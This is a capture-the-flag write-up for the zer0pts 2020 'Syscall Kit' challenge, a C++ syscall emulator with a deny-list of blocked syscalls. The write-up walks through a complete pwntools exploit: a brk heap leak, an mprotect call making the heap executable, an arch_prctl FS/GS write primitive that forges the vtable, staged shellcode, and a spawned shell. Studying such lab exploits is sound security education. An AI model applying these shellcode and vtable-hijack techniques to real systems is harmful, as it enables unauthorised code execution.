Post

Syscall Kit

Syscall Kit

zer0pts 2020 - Syscall Kit

Overview

Syscall Kit is a hard rated pwnable challenge created by ptr-yudai.

It is simply an emulator written in C++ that’s used to execute user-provided system calls.

There are some restrictions, however, and our goal is to pop a shell from this somewhat restricted sandbox.

You can download the challenge attachments here

Analysis

The challenge just contains two files:

  • chall
  • main.cpp

Here are the protections enabled on the binary.

1
2
3
4
5
6
7
8
9
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$ checksec chall
[*] '/home/mark/Desktop/Practice/BinExp/Challs/STACK/SyscallKit/chall'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        PIE enabled
    Stripped:   No
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$ 

When we run the program, we are asked to give it a syscall number and its arguments.

one

In this case, I used the exit syscall (syscall number 60), and from the return value we can see that it does in fact do what it says.

Since we are given the source code, we don’t have to reverse engineer the binary.

Here’s the source:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
/**
 * syscall kit - WinterKosenCTF 2020
 *
 * This application is (maybe) made for educational purpose
 * and for those who learn system calls.
 */
#include <iostream>
#include <sys/syscall.h>

/**
 * Emulator: stores one system call request (number plus three arguments)
 * and declares the virtual methods that read, filter and run it.
 */
class Emulator {
private:
  unsigned long rax;  // syscall number on entry; syscall() stores the return value here
  unsigned long rdi;  // first argument  ("arg1: " prompt)
  unsigned long rsi;  // second argument ("arg2: " prompt)
  unsigned long rdx;  // third argument  ("arg3: " prompt)
  virtual void set(std::string, unsigned long&);  // prompt for and read one value
  virtual int check();                            // non-zero => syscall number is rejected
  virtual void syscall();                         // issue the syscall with the stored values
public:
  Emulator();
  virtual void emulate();                         // interactive loop (10 rounds)
};

/**
 * Constructor: start with every emulated register field set to zero.
 */
Emulator::Emulator() {
  this->rax = 0;
  this->rdi = 0;
  this->rsi = 0;
  this->rdx = 0;
}

/**
 * Read system call number and arguments.
 *
 * Prints `msg` as a prompt, then extracts one unsigned long from
 * std::cin into `reg`. If the stream is not in a good state after the
 * extraction, the process exits with status 1.
 */
void Emulator::set(std::string msg, unsigned long &reg) {
  std::cout << msg;
  std::cin >> reg;
  if (!std::cin.good()) exit(1);
}

/**
 * Filter dangerous system calls.
 *
 * Returns 1 when the number stored in rax is at or above 0x40000000 or
 * equals one of the listed SYS_* constants, and 0 otherwise.
 */
int Emulator::check() {
  if (this->rax >= 0x40000000)   return 1; // x32 ABI is dangerous!
  if (this->rax == SYS_open)     return 1; // never open files
  if (this->rax == SYS_openat)   return 1;
  if (this->rax == SYS_write)    return 1; // no more leak
  if (this->rax == SYS_read)     return 1; // no more overwrite
  if (this->rax == SYS_sendfile) return 1;
  if (this->rax == SYS_execve)   return 1; // of course not!
  if (this->rax == SYS_execveat) return 1;
  if (this->rax == SYS_ptrace)   return 1; // may ruin the program
  if (this->rax == SYS_fork)     return 1;
  if (this->rax == SYS_vfork)    return 1;
  if (this->rax == SYS_clone)    return 1;
  return 0;
}

/**
 * Call syscall.
 *
 * Copies the stored rdi, rsi, rdx and rax fields into the matching CPU
 * registers, executes the `syscall` instruction, and stores the
 * resulting rax back into this->rax.
 *
 * NOTE(review): every step is a separate asm statement and none of them
 * declares clobbers, so this relies on the compiler leaving rdi/rsi/rdx
 * untouched between statements -- presumably true for the shipped build.
 */
void Emulator::syscall() {
  asm volatile ("movq %0, %%rdi":: "a"(this->rdi));  // arg1
  asm volatile ("movq %0, %%rsi":: "a"(this->rsi));  // arg2
  asm volatile ("movq %0, %%rdx":: "a"(this->rdx));  // arg3
  asm volatile ("movq %0, %%rax":: "a"(this->rax));  // syscall number
  asm volatile ("syscall");
  asm volatile ("movq %%rax, %0": "=a"(this->rax));  // keep the return value
}

/**
 * Run emulator.
 *
 * Performs 10 rounds of: read the syscall number and three arguments,
 * filter with check(), then either report the rejection on std::cerr or
 * execute the call and print its return value in hexadecimal.
 * A rejected syscall number still uses up one of the 10 rounds.
 */
void Emulator::emulate(void)
{
  int i;
  for(i = 0; i < 10; i++) {
    std::cout << "=========================" << std::endl;
    // set() is declared virtual in the class.
    this->set("syscall: ", this->rax);
    this->set("arg1: ", this->rdi);
    this->set("arg2: ", this->rsi);
    this->set("arg3: ", this->rdx);
    
    std::cout << "=========================" << std::endl;
    
    if (this->check()) {
      // Rejected: nothing is executed and no "retval: " line is printed.
      std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
      continue;
    } else {
      this->syscall();
      // After syscall(), rax holds the return value rather than the number.
      std::cout << "retval: " << std::hex << this->rax << std::endl;
    }
  }

  std::cout << "Bye!" << std::endl;
}

Emulator *m;

/**
 * Disable buffering on stdin, stdout and stderr, then allocate the
 * Emulator with `new` and store it in the file-scope pointer `m`.
 */
void setup(void)
{
  std::setbuf(stdin, NULL);
  std::setbuf(stdout, NULL);
  std::setbuf(stderr, NULL);

  m = new Emulator();
}

/**
 * Entry point: set up the emulator, run its interactive loop, then
 * terminate through exit(0) instead of returning.
 */
int main(void)
{
  setup();
  m->emulate();
  exit(0);
}

The code is small, but I’ll walk through each section.

First, there is a class named Emulator. It contains four private attributes representing the x86_64 system call calling convention registers, along with three private virtual methods (set, check and syscall) and one public virtual method (emulate).

1
2
3
4
5
6
7
8
9
10
11
12
13
class Emulator {
private:
  unsigned long rax;
  unsigned long rdi;
  unsigned long rsi;
  unsigned long rdx;
  virtual void set(std::string, unsigned long&);
  virtual int check();
  virtual void syscall();
public:
  Emulator();
  virtual void emulate();
};

This is the constructor. It simply initializes all of the object’s register fields to zero:

1
2
3
4
5
6
Emulator::Emulator() {
  this->rax = 0;
  this->rdi = 0;
  this->rsi = 0;
  this->rdx = 0;
}

The main function first initializes the object then calls the emulate method:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// Disable stdio buffering, then allocate the emulator on the heap and
// publish it through the file-scope pointer `m` that main() dereferences.
void setup(void)
{
  std::setbuf(stdin, NULL);
  std::setbuf(stdout, NULL);
  std::setbuf(stderr, NULL);

  // Assign the global `m`; declaring a new local `Emulator *m` here would
  // shadow it and leave the pointer used by main() unset.
  m = new Emulator();
}

int main(void)
{
  setup();
  m->emulate();
  exit(0);
}

The emulate method runs for 10 iterations. On each iteration, it sets the object’s register fields using Emulator::set.

After the registers are set, it calls Emulator::check; if the return value is non-zero it prints an error and continues with the next iteration, otherwise it calls Emulator::syscall.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void Emulator::emulate(void)
{
  int i;
  for(i = 0; i < 10; i++) {
    std::cout << "=========================" << std::endl;
    this->set("syscall: ", this->rax);
    this->set("arg1: ", this->rdi);
    this->set("arg2: ", this->rsi);
    this->set("arg3: ", this->rdx);
    
    std::cout << "=========================" << std::endl;
    
    if (this->check()) {
      std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
      continue;
    } else {
      this->syscall();
      std::cout << "retval: " << std::hex << this->rax << std::endl;
    }
  }

  std::cout << "Bye!" << std::endl;
}

void Emulator::set(std::string msg, unsigned long &reg) {
  std::cout << msg;
  std::cin >> reg;
  if (!std::cin.good()) exit(1);
}

Our main point of interest is Emulator::check:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int Emulator::check() {
  if (this->rax >= 0x40000000)   return 1; // x32 ABI is dangerous!
  if (this->rax == SYS_open)     return 1; // never open files
  if (this->rax == SYS_openat)   return 1;
  if (this->rax == SYS_write)    return 1; // no more leak
  if (this->rax == SYS_read)     return 1; // no more overwrite
  if (this->rax == SYS_sendfile) return 1;
  if (this->rax == SYS_execve)   return 1; // of course not!
  if (this->rax == SYS_execveat) return 1;
  if (this->rax == SYS_ptrace)   return 1; // may ruine the program
  if (this->rax == SYS_fork)     return 1;
  if (this->rax == SYS_vfork)    return 1;
  if (this->rax == SYS_clone)    return 1;
  return 0;
}

This method prevents the use of specific system calls, as well as any syscall value that falls into the x32 ABI range.

Conceptually, it behaves like a simple seccomp filter. If the syscall number in rax matches one of the blocked syscalls, check() returns 1, meaning the syscall should be rejected. Unlike a seccomp rule using SCMP_ACT_KILL_PROCESS, where attempting to execute a blocked syscall causes the process to be terminated, the emulator only prints an error and moves on to the next iteration, so it is closer in spirit to SCMP_ACT_ERRNO.

As expected, Emulator::syscall uses inline assembly to load the CPU registers with the values stored in the object, then executes the syscall instruction.

After the syscall runs, its return value is placed in rax, and that value is then written back into the object’s rax field.

The return value is also printed (as shown in the src code).

1
2
3
4
5
6
7
8
void Emulator::syscall() {
  asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
  asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
  asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
  asm volatile ("movq %0, %%rax":: "a"(this->rax));
  asm volatile ("syscall");
  asm volatile ("movq %%rax, %0": "=a"(this->rax));
}

Exploitation

What’s the vulnerability?

Well, there actually isn’t any vulnerability

The challenge description says this:

1
It's a good tool to learn syscall, isn't it?

So we somehow need to leverage this emulator to trigger a syscall that would eventually spawn a shell.

Looking at the setup, we can only control three arguments of the syscall of our choosing.

At the same time, it blocks so many syscalls that we could’ve easily used to gain a shell.

I’m going to be using this linux kernel syscall table as a reference

As of the latest kernel version (v6.17) there are 365 syscalls.

Does it mean we need to go through all the syscalls (354) not blocked by the emulator?

Not necessarily…

The approach I took was to filter the syscalls by the number of arguments each one takes.

There’s a json export of the syscall table here

I wrote a script to extract all the syscalls I can use that take three or fewer arguments.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import json

# Syscall numbers rejected by Emulator::check: read, write, open, openat,
# sendfile, execve, execveat, ptrace, fork, vfork, clone.
NUMBER = [0, 1, 2, 0x101, 0x28, 0x3b, 0x142, 0x65, 0x39, 0x3a, 0x38]
TABLE = "table.json"

with open(TABLE, "r") as handle:
    table = json.load(handle)

# Keep only entries whose signature has at most three parameters and
# whose number is not on the emulator's deny list.
usable = [
    entry
    for entry in table["syscalls"]
    if len(entry["signature"]) <= 3 and entry["number"] not in NUMBER
]

# Emit the survivors in the same {"syscall": [...]} envelope.
print(json.dumps({"syscall": usable}))

Doing that, however, only reduces the number of candidate syscalls to 236.

It’s still a lot.

two

I was thinking of spawning a local instance of the syscall table since it’s open source but that’s just a lot of work and tbf as of 2020 it never existed.

Luckily the UI is awesome, it has a view where we can see the arguments needed.

three

My goal remained the same: check out the syscalls that take three or fewer arguments.

Here are the syscalls I found interesting to check:

1
2
3
4
5
6
int brk(void *addr);
int mprotect(unsigned long start, size_t len, unsigned long prot);
ssize_t readv(int fd, const struct iovec *iov, int iovcnt);
ssize_t writev(int fd, const struct iovec *iov, int iovcnt);
int syscall(SYS_arch_prctl, int op, unsigned long addr);
// ....

Firstly, we need to make our goal clear. Our goal is to gain $rip control.

What possible way can this be achieved?

One way would be a virtual function table (vtable) hijack.

C++ is an object oriented programming language.

Virtual functions are a key mechanism for supporting polymorphism in C++.

For each class with virtual functions, depending on the class inheritance hierarchy, the compiler will create one or more associated virtual function tables (vtables).

Looking at the object’s initialization, we can see that the Emulator instance is allocated on the heap:

1
2
3
4
5
6
7
8
void setup(void)
{
  std::setbuf(stdin, NULL);
  std::setbuf(stdout, NULL);
  std::setbuf(stderr, NULL);

  m = new Emulator();
}

Here’s the heap layout after initialization:

four

gef> emu_dump 0x5555556162b0
====== Emulator @ 0x5555556162b0 ======
[+] vtable            : 0x555555602ce0
[+] virtual functions
    [0] -> 0x555555401114
    [1] -> 0x55555540116e
    [2] -> 0x555555401290
    [3] -> 0x5555554012d8
===============================

This is the gdb script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# emu_dump ADDR
# Print the vtable pointer stored at ADDR (the start of an Emulator object)
# and the first four function pointers found in that vtable.
define emu_dump
    set $base = (char *)$arg0

    printf "====== Emulator @ %p ======\n", $base

    # The first 8 bytes of the object hold the vtable pointer.
    set $vtable = *(void **)$base
    printf "[+] vtable            : %p\n", $vtable

    printf "[+] virtual functions\n"

    # Walk four 8-byte slots, one per virtual method declared in the class.
    set $i = 0
    while $i < 4
        set $fn = *(void **)($vtable + ($i * 8))
        printf "    [%d] -> %p\n", $i, $fn
        set $i = $i + 1
    end

    printf "===============================\n"
end

Because the vtable pointer itself resides in a heap-allocated object, it becomes a writable target.

If we can forge the vtable, then any subsequent virtual method call on the object would dereference our fake vtable and jump to our controlled function pointer instead.

But before we perform a write, we need to know the location of the heap.

Reading the man page for brk

man1

1
Calling sbrk() with an increment of 0 can be used to find the current location of the program break.

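The program break marks the point where the heap currently ends in the process’s virtual address space. The raw brk system call gives us the same information: when the requested address is not acceptable (such as 0), the kernel leaves the break unchanged and returns its current value.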

Here’s the helper function I wrote:

1
2
3
4
5
6
7
8
def syscall(sys_num, rdi=0, rsi=0, rdx=0):
    """Submit one syscall request to the emulator and return its result.

    Answers the four prompts in order with decimal values, then parses
    the hexadecimal number that follows "retval: ".
    """
    answers = (
        (b"syscall:", sys_num),
        (b"arg1:", rdi),
        (b"arg2:", rsi),
        (b"arg3:", rdx),
    )
    for prompt, value in answers:
        io.sendlineafter(prompt, str(value).encode())

    io.recvuntil(b"retval: ")
    return int(io.recvline(), 16)

We can leak the heap address by doing this:

1
2
3
4
PAGE = 0x21000
brk  = 0xc
heap_base = syscall(brk, 0) - PAGE
info("heap base: %#x", heap_base)

If you think about it, we now have the heap address, but we still don’t know any other address in memory (e.g. libc), and to corrupt a vtable we need some form of arbitrary write primitive.

The reason we would need a libc leak is to be able to call functions like system or a one gadget, but that would require us to create an arbitrary read.

In essence, that would increase the number of syscalls we need to make, and remember that we only get 10 of them.

A way around that is to change the heap protection to (PROT_READ | PROT_WRITE | PROT_EXEC) making the heap region RWX.

1
2
mprotect    = 0xa
syscall(mprotect, heap_base, PAGE, 0x7)

With that we can simply just jump to the heap and get shellcode execution going.

But now how do we corrupt the vtable?

This was where the issue began!

While going through the syscalls, I found an interesting system call called arch_prctl.

man2 man3

1
2
int syscall(SYS_arch_prctl, int op, unsigned long addr);
int syscall(SYS_arch_prctl, int op, unsigned long *addr);

It says:

  • with the ARCH_SET_FS subfunction, we are able to set the 64-bit base for the FS register to addr
  • ARCH_GET_FS returns the 64-bit base value for the FS register of the calling thread and stores it in the memory pointed to by addr

The same goes for the GS register

In case you don’t know what the FS and GS registers are: they’re segment registers, but on modern 64-bit systems they’re mostly used for thread-local and CPU-local data.

You can check it out here

The important thing however is that this gives us a form of arbitrary write.

We can quickly test it out:

1
2
3
arch_prctl  = 0x9e
syscall(arch_prctl, ARCH_SET_FS, 0x414141414141)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)
gdb1
Before updating $fs_base
gdb2
After updating $fs_base

At this point, we’ve corrupted the fs_base register.

But once the program returns to Emulator::emulate it crashes

gdb2
Crashed

This makes sense, because the fs register is constantly referenced during program execution (e.g reading the stack canary fs:0x28).

Now this forces us to write only valid addresses into memory, which slightly constrains the primitive.

However, this isn’t a major obstacle because we can now overwrite the object’s vtable pointer itself.

But how to gain $rip from this?

Here’s what I initially did.

If you’ve noticed, arch_prctl only takes two arguments, so the third syscall argument is not actually used by the syscall, yet we fully control its value. That makes it a convenient place to stage data.

So the idea is to construct a fake object layout like this:

1
2
*(uintptr_t*)fake_vtable = (uintptr_t)&this->arg3;  /* slot [0] -> address of arg3 */
this->vtable = fake_vtable;

With this setup, when Emulator::emulate makes its next virtual call to Emulator::set, execution will dereference the corrupted vtable pointer, land in our fake vtable, and then invoke the first function pointer.

That function pointer holds the address of this->arg3, whose contents we control directly.

Since that is where we’ve placed our staged shellcode, we are able to execute shellcode; the restriction is that we can only use 8 bytes of shellcode.

Here’s a sample:

1
2
3
4
5
6
7
8
9
10
arch_prctl  = 0x9e
emu_obj = heap_base + 0x122b0
vtable_addr = heap_base + 0x200
vtable  = emu_obj + 0x20

syscall(arch_prctl, ARCH_SET_FS, vtable)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)

syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
syscall(arch_prctl, ARCH_GET_FS, emu_obj, 0x9090909090909090)
gdb4
Faked vtable

The method Emulator::set is called back at Emulator::emulate:

1
this->set("syscall: ", this->rax);

This is the register state at the point of the program executing our shellcode.

gdb5 gdb6

Ideally, we would want to create a staged shellcode (i.e do read syscall)

1
ssize_t read(int fd, void buf[.count], size_t count)

The reason is that we can’t do much with just 8 bytes.

For a staged execution we can use the initial control flow to trigger a second-stage payload that lives elsewhere (e.g. heap), then jump into that.

We only need to control 4 registers (rax, rdi, rsi, rdx).

In our case, all registers are populated by the emulator’s calling convention, which makes clean syscall setup difficult.

This was the shortest shellcode I could come up with.

1
2
3
4
5
xor eax, eax
mov edi, eax
mov rsi, [rsp+0x10]
shr edx, 0x1
syscall

It requires 13 bytes which is too much.

sc

What now?

I decided to check the second subfunction (writing to GS)

It behaves in a similar way however it doesn’t require that we pass in a valid address to it.

gdb7
Before updating $gs_base
gdb8
After updating $gs_base
gdb9
Arbitrary write successful

This is good: recall that our shellcode is 13 bytes and only the first 8 bytes fit in arg3, so we’re left with 5 bytes to place elsewhere.

With this arbitrary write, we can place the remaining bytes at (uint8_t*)&this->arg3 + 8.

Actually, I did notice a thing with writing to the segment registers.

It can only store up to a certain value.

Checking the kernel source code for the syscall handler do_arch_prctl_64

kernel

If the value we want to write is greater than or equal to TASK_SIZE_MAX, it returns -EPERM

1
#define	EPERM		 1	/* Operation not permitted */

Cross-referencing this, we end up at the following kernel trace:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define TASK_SIZE_MAX		task_size_max()

static __always_inline unsigned long task_size_max(void)
{
	unsigned long ret;

	alternative_io("movq %[small],%0","movq %[large],%0",
			X86_FEATURE_LA57,
			"=r" (ret),
			[small] "i" ((1ul << 47)-PAGE_SIZE),
			[large] "i" ((1ul << 56)-PAGE_SIZE));

	return ret;
}

#define X86_FEATURE_LA57		(16*32+16) /* "la57" 5-level page tables */

All this is doing is defining the maximum user-space virtual address range. In other words, it sets the upper boundary of valid user-mode addresses, ensuring we can’t map or use pointers outside of user space.

Anyway, our 5 leftover bytes (40 bits) fit comfortably within this range.

Here’s the final solve:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

exe = context.binary = ELF('chall')

context.terminal = ['gnome-terminal', '--maximize', '-e']
context.log_level = 'info'

def start(argv=[], *a, **kw):
    """Launch the target under GDB, against a remote host, or locally.

    The GDB and REMOTE pwntools arguments select the mode; for REMOTE the
    host and port are taken from sys.argv[1] and sys.argv[2].
    """
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    if args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    return process([exe.path] + argv, *a, **kw)

gdbscript = '''
brva 0x12C4 
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

def init():
    """Start the target and store the resulting tube in the global `io`."""
    global io

    io = start()

def syscall(sys_num, rdi=0, rsi=0, rdx=0):
    """Submit one syscall request to the emulator and return its result.

    Answers the four prompts in order with decimal values, then parses
    the hexadecimal number that follows "retval: ".
    """
    answers = (
        (b"syscall:", sys_num),
        (b"arg1:", rdi),
        (b"arg2:", rsi),
        (b"arg3:", rdx),
    )
    for prompt, value in answers:
        io.sendlineafter(prompt, str(value).encode())

    io.recvuntil(b"retval: ")
    return int(io.recvline(), 16)

def solve():
    """Drive the emulator through the exploit chain and drop to a shell.

    Uses eight emulator rounds: leak the heap with brk, make it RWX with
    mprotect, build a fake vtable with arch_prctl FS/GS base writes, and
    finally overwrite the object's vtable pointer so the next virtual call
    runs a 13-byte read() stub, which pulls in the real shellcode.
    """

    # System call numbers (x86_64).
    brk         = 0xc
    mprotect    = 0xa
    arch_prctl  = 0x9e

    # arch_prctl subfunction codes.
    ARCH_SET_GS = 0x1001
    ARCH_SET_FS = 0x1002
    ARCH_GET_FS = 0x1003
    ARCH_GET_GS = 0x1004
    # Size subtracted from the program break to reach the heap base.
    PAGE        = 0x21000
    
    # Little-endian bytes -> int, for payloads shorter than 8 bytes.
    # NOTE(review): this shadows pwntools' own pack() from `from pwn import *`.
    pack = lambda data: int.from_bytes(data, byteorder='little')

    # brk(0) returns the current program break, i.e. the end of the heap.
    heap_base = syscall(brk, 0) - PAGE
    info("heap base: %#x", heap_base)

    # Offsets taken from the write-up's debugging session of this binary.
    emu_obj = heap_base + 0x122b0    # the heap-allocated Emulator object
    vtable_addr = heap_base + 0x200  # scratch heap slot used as the fake vtable
    vtable  = emu_obj + 0x20         # address of the object's arg3 (rdx) field

    # Make the heap readable, writable and executable (prot = 0x7).
    syscall(mprotect, heap_base, PAGE, 0x7)

    # Write primitive: SET_FS loads a value into the FS base, GET_FS stores
    # it at the given address. Here: fake_vtable[0] = &arg3.
    syscall(arch_prctl, ARCH_SET_FS, vtable)
    syscall(arch_prctl, ARCH_GET_FS, vtable_addr)

    # Stage 1 (13 bytes): read(0, [rsp+0x10], rdx >> 1).
    # presumably [rsp+0x10] and rdx hold usable values at hijack time, as
    # observed in the debugger -- not verifiable from this script alone.
    sc = asm(
        """
        sc:
            xor eax, eax
            mov edi, eax
            mov rsi, [rsp+0x10]
            shr edx, 0x1
            syscall
        """
    )

    # Bytes 8..12 of the stub do not fit in arg3; they go right after it.
    cont = sc[8:]

    # The GS pair is used for this write instead of the FS pair.
    syscall(arch_prctl, ARCH_SET_GS, pack(cont))
    syscall(arch_prctl, ARCH_GET_GS, emu_obj + 0x28)

    # Overwrite the object's vtable pointer with the fake vtable address and,
    # in the same request, place the first 8 stub bytes in arg3.
    syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
    syscall(arch_prctl, ARCH_GET_FS, emu_obj, u64(sc[:8]))

    # Stage 2: NOP sled followed by a /bin/sh shellcode, consumed by the
    # read() issued from the stage-1 stub.
    payload  = asm("nop") * 0x100
    payload += asm(shellcraft.sh())

    io.send(payload)

    io.interactive()

def main():
    """Start the target, then run the exploit."""
    
    init()
    solve()
    
if __name__ == '__main__':
    main()

Running it works!

done

Resources

This post is licensed under CC BY 4.0 by the author.